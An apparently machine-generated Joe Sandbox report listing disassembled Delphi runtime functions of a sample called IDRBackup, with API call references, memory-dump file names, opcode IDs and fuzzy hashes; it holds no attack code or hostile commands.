                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Move$qqrpxvpviSystem@System@@$Clr$qqrpvFreeStringString$qqriWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2700047326-0
                                                                                                  • Opcode ID: 2a90c5cc7be5839c9d2fdc1aa24c1342b383aaa77810758ece04b21b21fc663a
                                                                                                  • Instruction ID: 98f1936eb00471f73aa790e79a7215fb5c6e676163bb9629522c800d1bc1a43f
                                                                                                  • Opcode Fuzzy Hash: 2a90c5cc7be5839c9d2fdc1aa24c1342b383aaa77810758ece04b21b21fc663a
                                                                                                  • Instruction Fuzzy Hash: 1501F7313096454BAB14DA6DECA09AEB3D8DF90610B80033DFA84C7351EE20ED05C384
                                                                                                  Function 5001C2C8 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5001C2D3
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5001C348), ref: 5001C300
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @Sysutils@ByteType$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,5001C348), ref: 5001C31C
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5001C34F), ref: 5001C342
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$ByteClr$qqrpvInternalRef$qqrpvSysutils@T$us$i0$%iType$qqrx27
                                                                                                  • String ID:
                                                                                                  • API String ID: 3795063905-0
                                                                                                  • Opcode ID: 0090cee197739f04d46da03a3fbf7122e71953c6443ae2ffadc7c537a123e11b
                                                                                                  • Instruction ID: edce9a773ba6554bf0e1fbf5d896e20fbc1511fab1bfff3c5ce3298a0291d8fe
                                                                                                  • Opcode Fuzzy Hash: 0090cee197739f04d46da03a3fbf7122e71953c6443ae2ffadc7c537a123e11b
                                                                                                  • Instruction Fuzzy Hash: 47014C30704289EF9B11DEA9DE92C6EB3F8FB482107A18275E504D3251EB70EF80D655
                                                                                                  Function 5000A534 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@UniqueString$qqrr20System@UnicodeString.RTL120 ref: 5000A53F
                                                                                                    • Part of subcall function 5000AAF8: @System@@NewUnicodeString$qqri.RTL120(?,5000A544), ref: 5000AAC6
                                                                                                    • Part of subcall function 5000AAF8: @System@Move$qqrpxvpvi.RTL120(00000000,?,5000A544), ref: 5000AAD7
                                                                                                    • Part of subcall function 5000AAF8: @System@@FreeMem$qqrpv.RTL120(?,5000A544), ref: 5000AAEC
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A559
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5000A593
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A59D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$String$AnsiFromMove$qqrpxvpviStr$qqrr20Stringx27System@%T$us$i0$%$FreeInternalLength$qqrr20Mem$qqrpvString$qqriString$qqrr20StringiUnique
                                                                                                  • String ID:
                                                                                                  • API String ID: 2646382837-0
                                                                                                  • Opcode ID: c65559b3a43a539bc9f39b9396eb3fc635474360def7c2b98761288a201bb686
                                                                                                  • Instruction ID: 572ec78243513e6f1005ed345ec0839db98a53653f4091473b1bd5e8e29c749c
                                                                                                  • Opcode Fuzzy Hash: c65559b3a43a539bc9f39b9396eb3fc635474360def7c2b98761288a201bb686
                                                                                                  • Instruction Fuzzy Hash: E001DF317029624BAB109A3DDDA1559B3A6BFD6215394433AA506CB21EDA71CC0582C1
                                                                                                  Function 500141D4 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@Random$qqrv.RTL120 ref: 500141DA
                                                                                                  • @System@Random$qqrv.RTL120 ref: 500141EF
                                                                                                  • @System@Ln$qqrxg.RTL120(?,?,?), ref: 5001422E
                                                                                                  • @System@Sqrt$qqrxg.RTL120 ref: 50014245
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Random$qqrv$Ln$qqrxgSqrt$qqrxg
                                                                                                  • String ID:
                                                                                                  • API String ID: 817724637-0
                                                                                                  • Opcode ID: a6d630325e0aea591bba7b45fbec38567b7a778495fcfedd49ce34c84d5982ca
                                                                                                  • Instruction ID: fbb615ccd8c33ff108ba09c26bee9e4f63df910d59be1be1ea666f5daae47871
                                                                                                  • Opcode Fuzzy Hash: a6d630325e0aea591bba7b45fbec38567b7a778495fcfedd49ce34c84d5982ca
                                                                                                  • Instruction Fuzzy Hash: 9D11A3A1E0E0A962DB5227B1FC254CD7F74EE52901B968B4BE8E160172E92344B0CB91
                                                                                                  Function 50012310 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122D7
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122E6
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122EB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$String$Except$qqrvException@$bctr$qqrx20LoadRaiseString$qqrp20System@@Sysutils@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 486460785-0
                                                                                                  • Opcode ID: 7528642fe36d409ab37d41aa7cd802e04feb64ed356f621298a75c45d9c0b7a2
                                                                                                  • Instruction ID: 93523e8249dd9ce77bc6417ffb8b9f6d823e4069e3a6fe8b24fa869761cfaa76
                                                                                                  • Opcode Fuzzy Hash: 7528642fe36d409ab37d41aa7cd802e04feb64ed356f621298a75c45d9c0b7a2
                                                                                                  • Instruction Fuzzy Hash: 73014531108188AFE7219B54FD5285DBBE8EF11B00FA14A67F880C3121EA36AE20C691
                                                                                                  Function 50015CF8 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 50015D0B
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50015D71), ref: 50015D38
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@LStrCopy$qqrv.RTL120(?,00000000,50015D71), ref: 50015D56
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50015D78), ref: 50015D6B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiFromStr$qqrr27StringStringusSystem@System@%T$us$i0$%x20Unicode$Clr$qqrpvCopy$qqrvInternalRef$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 189229420-0
                                                                                                  • Opcode ID: 2c5b7d96146a322dd601ddb1deb345cfb3d3b2af0608aa2e436bffa10a0899dc
                                                                                                  • Instruction ID: 021ebf48e049fbdcf8c921bc4b6c542263af2dc2d6db323e98c0c3942a0dd369
                                                                                                  • Opcode Fuzzy Hash: 2c5b7d96146a322dd601ddb1deb345cfb3d3b2af0608aa2e436bffa10a0899dc
                                                                                                  • Instruction Fuzzy Hash: 4101B130A04685EF9F11CFB8EDA289DB7F9EF482007A046B2E500D7244EB709E40CB90
                                                                                                  Function 5002D5A8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D61B), ref: 5002D5E1
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002D61B), ref: 5002D5F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal
                                                                                                  • String ID:
                                                                                                  • API String ID: 4285912285-0
                                                                                                  • Opcode ID: b9cb69941f6bd798a715a23d18ccd4e8101779eda8d34779b1012db782d0a2da
                                                                                                  • Instruction ID: 2bb75f54c739022caca7f9861818caf256e2ce358085963fa9b364de837498d7
                                                                                                  • Opcode Fuzzy Hash: b9cb69941f6bd798a715a23d18ccd4e8101779eda8d34779b1012db782d0a2da
                                                                                                  • Instruction Fuzzy Hash: 0C01A230701A96EFAF01DFA8E9A1859B3F8EF4920079046B2E604D3311EB70EE01D650
                                                                                                  Function 50015BB0 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50015C25,?,?,?,?,00000000,00000000), ref: 50015BDC
                                                                                                    • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,00000000,50015C25,?,?,?,?,00000000,00000000), ref: 50015BF5
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120(00000000,5000A525), ref: 5000A50A
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,?,?,?,?,00000000,50015C25,?,?,?,?,00000000,00000000), ref: 50015C05
                                                                                                    • Part of subcall function 5000A2B4: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A2FE
                                                                                                    • Part of subcall function 5000A2B4: @System@Move$qqrpxvpvi.RTL120(00000000,00000000), ref: 5000A357
                                                                                                    • Part of subcall function 5000A2B4: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A365
                                                                                                    • Part of subcall function 5000A2B4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A37A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@$Unicode$From$CharCopy$qqrx20Len$qqrr20StringStringii$AnsiAsg$qqrr20Clr$qqrpvInternalLength$qqrr20Move$qqrpxvpviN$qqrvStr$qqrr20StringiStringpbiStringpciStringx20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 1635326871-0
                                                                                                  • Opcode ID: 8cb56cd88bb66136543759b54e723b42c2fdfd39fe3a5cbddfe58b74c9f845cd
                                                                                                  • Instruction ID: 01ec1028dada33f9320da5f488b3fc25f556a4d1c72985eefc9655cf80fcc98c
                                                                                                  • Opcode Fuzzy Hash: 8cb56cd88bb66136543759b54e723b42c2fdfd39fe3a5cbddfe58b74c9f845cd
                                                                                                  • Instruction Fuzzy Hash: 0D01F435200248BFEB018E98DC51F9ABBADEF8D320F608676B504D7782DA759E0086A0
                                                                                                  Function 5001980C Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,00000000,50019880), ref: 50019831
                                                                                                  • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(?,00000000,50019880), ref: 50019839
                                                                                                  • CLSIDFromString.OLE32(00000000,?,00000000,50019880), ref: 5001983F
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(50019887,50019880), ref: 5001987A
                                                                                                    • Part of subcall function 500197B8: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?,5001E08F), ref: 500197CC
                                                                                                    • Part of subcall function 500197B8: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?,5001E08F), ref: 500197D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@$FromWide$Char$qqrx17Clr$qqrpvExcept$qqrvException@$bctr$qqrp20RaiseRecpx14RecxiStr$qqrr17Stringx20Sysutils@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1168828238-0
                                                                                                  • Opcode ID: 9ab87b7335fb4515f68039e7d798c1498550c4d3bc14ec7b5041b138188d54e0
                                                                                                  • Instruction ID: 4276e7b8eb8c2fd0cf21d2c372ffec7e5207b388c706a152fa8cb5ce2d8a9212
                                                                                                  • Opcode Fuzzy Hash: 9ab87b7335fb4515f68039e7d798c1498550c4d3bc14ec7b5041b138188d54e0
                                                                                                  • Instruction Fuzzy Hash: D901D630904688AFEF05CFB5DC519CEB7E8DF4A210F90467AF800D3251EE349E008650
                                                                                                  Function 5000B590 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000B59C
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000B600), ref: 5000B5CE
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@WStrFromPCharLen$qqrr17System@WideStringpci.RTL120(00000000,5000B600), ref: 5000B5E5
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000B607), ref: 5000B5FA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$FromSystem@$AnsiStr$qqrr27StringStringusSystem@%T$us$i0$%x20Unicode$CharClr$qqrpvInternalLen$qqrr17Ref$qqrpvStringpciWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 179845556-0
                                                                                                  • Opcode ID: 8a79d907e03b4d6e94affb683d3040e6e61c9eeb7bdf99ad1ec3cb23640d17fb
                                                                                                  • Instruction ID: 34ef6e9b8ab651ca66ea423fa2b672ec6f6307ffe3dcc90be6e42d6dd710627f
                                                                                                  • Opcode Fuzzy Hash: 8a79d907e03b4d6e94affb683d3040e6e61c9eeb7bdf99ad1ec3cb23640d17fb
                                                                                                  • Instruction Fuzzy Hash: 8B014F30A14689DFAF15EFB8DD6166EB7F8EB44300BE042B5A404D3294EB75EE00D785
                                                                                                  Function 5001D088 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001D0F1), ref: 5001D0AB
                                                                                                    • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
                                                                                                    • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                  • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001D0F1), ref: 5001D0B5
                                                                                                    • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                    • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                    • Part of subcall function 5001C70C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                  • @System@@UStrDelete$qqrr20System@UnicodeStringii.RTL120(00000000,5001D0F1), ref: 5001D0D6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
